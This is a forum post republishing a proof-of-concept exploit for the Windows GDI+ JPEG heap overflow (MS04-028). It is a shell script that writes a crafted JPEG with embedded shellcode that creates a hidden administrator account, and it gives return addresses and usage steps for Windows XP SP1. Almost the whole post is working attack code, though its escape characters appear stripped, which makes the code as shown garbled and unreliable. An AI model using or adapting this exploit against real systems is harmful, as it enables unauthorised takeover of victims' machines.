‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Windows JPEG GDI+ Overflow Administrator Exploit (MS04-028)

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6819 
精华
834 
积分
36070 
阅读权限
255 
性别
男 
来自
中国 
在线时间
586 小时 
注册时间
2004-6-25 
最后登录
2008-9-6 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-9-24 01:35  只看该作者

Windows JPEG GDI+ Overflow Administrator Exploit (MS04-028)

文章作者:Elia Florio
复制内容到剪贴板
代码:
#!/bin/sh
#
# MS04-028 Exploit PoC II with Shellcode: CreateUser X in Administrators Group
#
# Tested on:
# WinXP Professional English SP1 - GDIPLUS.DLL version 5.1.3097.0
# WinXP Professional Italian SP1 - GDIPLUS.DLL version 5.1.3101.0
# (SP2 is not vulnerable, don't waste your time trying this exploit on it!)
#
# Usage:
#    first,  replace the "xCC" = INT3 instruction at beginning of shellcode
#    second, choose a right ret address for GDI+ DLL and WinXP version
#    then,  create crafted JPEG with: sh ms04-028.sh > img.jpg
#
# Created by:
#    Elia Florio
#    (heap overflow study purpose, not for lamerz, not for script-kiddie)
#
# Thanx to:
# jerome.athias
# metasploit.org
# idefense
# full-disclosure list

#********************************************
#Standard JPEG header
#********************************************
printf "xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64x00x60x00x00"
printf "xFFxECx00x11x44x75x63x6Bx79x00x01x00x04x00x00x00x0Ax00x00"
printf "xFFxEEx00x0Ex41x64x6Fx62x65x00x64xC0x00x00x00x01"

#********************************************
#Heap Overflow Trigger DWORD - 00 length field (01 works too)
#********************************************
printf "xFFxFEx00x01"


#********************************************
#Additional stuff to complete the header
#********************************************
printf  "x00x14x10x10x19x12x19x27x17x17x27x32"


#********************************************
#Sugg. by jerome.athias
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
#********************************************
printf "xEBx0Fx26x32" #control ECX register


#********************************************
#Address of shellcode
#********************************************
printf "x42x42x42x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
#printf "xDCxB1xE7x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "xDCxB1x30x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0


#********************************************
#end_of_jpeg_header
#********************************************
printf "x26x2Ex3Ex35x35x35x35x35x3E"
#NOP1
printf "xE8x00x00x00x00x5Bx8Dx8B"
printf "x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8"

#********************************************
#Image junk here...fake JPG
#********************************************
printf
"x00x00x00xFFxDBx00x43x00x08x06x06x07x06x05x08x07x07";
printf
"x07x09x09x08x0Ax0Cx14x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14";
printf
"x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24x2Ex27x20x22x2Cx23x1C";
printf
"x1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39x3Dx38x32x3C";
printf
"x2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18x0D";
printf
"x0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32";
printf
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32";
printf
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32";
printf
"x32x32x32x32x32xFFxC0x00x11x08x00x03x00x03x03x01x22";
printf
"x00x02x11x01x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01";
printf
"x01x01x01x01x00x00x00x00x00x00x00x00x01x02x03x04x05";
printf
"x06x07x08x09x0Ax0BxFFxC4x00xB5x10x00x02x01x03x03x02";
printf
"x04x03x05x05x04x04x00x00x01x7Dx01x02x03x00x04x11x05";
printf
"x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1x08";
printf
"x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17";
printf
"x18x19x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43";
printf
"x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64";
printf
"x65x66x67x68x69x6Ax73x74x75x76x77x78x79x7Ax83x84x85";
printf
"x86x87x88x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4";
printf
"xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3";
printf
"xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1";
printf
"xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8";
printf
"xF9xFAxFFxC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01";
printf
"x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0A";
printf
"x0BxFFxC4x00xB5x11x00x02x01x02x04x04x03x04x07x05x04";
printf
"x04x00x01x02x77x00x01x02x03x11x04x05x21x31x06x12x41";
printf
"x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1x09x23";
printf
"x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19";
printf
"x1Ax26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47";
printf
"x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68";
printf
"x69x6Ax73x74x75x76x77x78x79x7Ax82x83x84x85x86x87x88";
printf
"x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4xA5xA6xA7";
printf
"xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6";
printf
"xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5";
printf
"xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00";
printf
"x0Cx03x01x00x02x11x03x11x00x3Fx00xF9xFEx8Ax28xA0x0F";

#********************************************
#"A" buffer
#********************************************
perl -e 'print "x41"x1601'; #buffer 1601 x NOP

#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "xCCx90x90x90"; #replace "CC=INT3" byte with NOP to make it
works!

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for
your Framework, is great!)
#********************************************
printf "x66x81xecx80x00x89xe6xe8xb7x00x00x00x89x06x89xc3"
printf "x53x68x7exd8xe2x73xe8xbdx00x00x00x89x46x0cx53x68"
printf "x8ex4ex0execxe8xafx00x00x00x89x46x08x31xdbx53x68"
printf "x70x69x33x32x68x6ex65x74x61x54xffxd0x89x46x04x89"
printf "xc3x53x68x5exdfx7cxcdxe8x8cx00x00x00x89x46x10x53"
printf "x68xd7x3dx0cxc3xe8x7ex00x00x00x89x46x14x31xc0x31"
printf "xdbx43x50x68x72x00x73x00x68x74x00x6fx00x68x72x00"
printf "x61x00x68x73x00x74x00x68x6ex00x69x00x68x6dx00x69"
printf "x00x68x41x00x64x00x89x66x1cx50x68x58x00x00x00x89"
printf "xe1x89x4ex18x68x00x00x5cx00x50x53x50x50x53x50x51"
printf "x51x89xe1x50x54x51x53x50xffx56x10x8bx4ex18x49x49"
printf "x51x89xe1x6ax01x51x6ax03xffx76x1cx6ax00xffx56x14"
printf "xffx56x0cx56x6ax30x59x64x8bx01x8bx40x0cx8bx70x1c"
printf "xadx8bx40x08x5exc2x04x00x53x55x56x57x8bx6cx24x18"
printf "x8bx45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01"
printf "xebxe3x32x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38"
printf "xe0x74x07xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1"
printf "x8bx5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04"
printf "x8bx01xe8xebx02x31xc0x89xeax5fx5ex5dx5bxc2x08x00";

#********************************************
#end_of_jpeg
#********************************************
printf "xFFxD9";

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题